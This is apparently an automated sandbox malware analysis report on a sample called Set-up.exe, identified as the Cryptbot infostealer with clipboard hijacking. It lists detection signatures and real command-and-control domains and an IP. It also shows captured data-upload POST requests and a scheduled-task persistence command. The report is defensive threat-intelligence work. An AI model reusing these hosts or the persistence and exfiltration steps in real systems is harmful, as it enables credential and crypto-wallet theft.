Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1525759
MD5:	b13e354d435e1c6058a47f21c02d340d
SHA1:	27bf445af2cf41ecd8b63d6a4f69e0daec155070
SHA256:	69de589ce17aef3d2b265ef806d8783d882e53671542518d1379c7cbbf8f67d0
Tags:	exeuser-aachum
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: B13E354D435E1C6058A47F21C02D340D)

service123.exe (PID: 3452 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 9B62814A6554664282F49BF19A2D734C)

schtasks.exe (PID: 4428 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 1996 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 9B62814A6554664282F49BF19A2D734C)

service123.exe (PID: 2092 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 9B62814A6554664282F49BF19A2D734C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["analforeverlovyu.top", "tventyvr20pt.top", "@tventyvr20pt.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.2071148102.0000000004263000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 7300	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 7300	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 7300	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 3452	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.service123.exe.6ca20000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7300, ParentProcessName: Set-up.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 4428, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T14:43:54.751804+0200	2054350	1	A Network Trojan was detected	192.168.2.10	49819	185.244.181.140	80	TCP
2024-10-04T14:43:59.110535+0200	2054350	1	A Network Trojan was detected	192.168.2.10	49854	185.244.181.140	80	TCP
2024-10-04T14:44:04.010705+0200	2054350	1	A Network Trojan was detected	192.168.2.10	49880	185.244.181.140	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Set-up.exe.7300.1.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "tventyvr20pt.top", "@tventyvr20pt.top"]}

Multi AV Scanner detection for submitted file

Source: Set-up.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007B15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_007B15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA214B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_6CA214B0

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	5_2_007B81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA9AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA9AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA9AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6CA40860
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6CA4A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6CA4A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6CA4A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6CAFF960h	5_2_6CA3EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6CAC84A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA44453
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6CA4A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6CA4A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6CA4A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6CA4C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6CA4E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6CA4E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	5_2_6CAC0730
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6CA40740
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA9C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA9C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	5_2_6CA7A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6CA40260
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6CAFD014h]	5_2_6CAF4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA9BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6CA97D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6CA93840
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	5_2_6CA4D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6CA5BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6CA5BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6CA79B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA9B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6CA4D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6CAFDFF4h	5_2_6CA93690
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_6CA99600
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	5_2_6CA4D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	5_2_6CA4D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA3B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6CAC3140
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA4D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6CAB7350

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49819 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49880 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49854 -> 185.244.181.140:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: tventyvr20pt.top
Source: Malware configuration extractor	URLs: @tventyvr20pt.top

Source: Joe Sandbox View

IP Address: 185.244.181.140 185.244.181.140

Source: Joe Sandbox View

ASN Name: BELCLOUDBG BELCLOUDBG

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary61629611User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: tventyvr20pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary88671164User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 76606Host: tventyvr20pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary46959985User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30035Host: tventyvr20pt.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: tventyvr20pt.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary61629611User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: tventyvr20pt.top

Source: Set-up.exe, 00000001.00000003.1511322357.000000000186A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1511093463.0000000001867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvr20pt.top/v1/upload.php
Source: Set-up.exe, 00000001.00000002.2100341753.0000000001867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvr20pt.top/v1/upload.phpX
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: siNpVQuBSTLTLeNwdJHL.dll.1.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe	String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6CA39C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_6CA39C22

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA39C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6CA39C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA39D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6CA39D11

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6CA39E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_6CA39E27

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\Set-up.exe

File dump: service123.exe.1.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007B51B0	5_2_007B51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007B3E20	5_2_007B3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA62CCE	5_2_6CA62CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA2CD00	5_2_6CA2CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA2EE50	5_2_6CA2EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA30FC0	5_2_6CA30FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA70AC0	5_2_6CA70AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA344F0	5_2_6CA344F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA646E0	5_2_6CA646E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA587C0	5_2_6CA587C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA607D0	5_2_6CA607D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA62090	5_2_6CA62090
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA70060	5_2_6CA70060
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA52360	5_2_6CA52360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA7DC70	5_2_6CA7DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA35880	5_2_6CA35880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA598F0	5_2_6CA598F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA67A20	5_2_6CA67A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA6DBEE	5_2_6CA6DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA6140E	5_2_6CA6140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA71510	5_2_6CA71510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA6F610	5_2_6CA6F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA4F760	5_2_6CA4F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA370C0	5_2_6CA370C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CAE50D0	5_2_6CAE50D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA23000	5_2_6CA23000

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAF3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAEADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAF36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAF3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAF5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAF3560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAF5980 appears 83 times

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\jYNgbRlwbH

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\hRspMaLdjdjKRSFxtNUo

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000001.00000003.1566896930.00000000039E8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-up.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
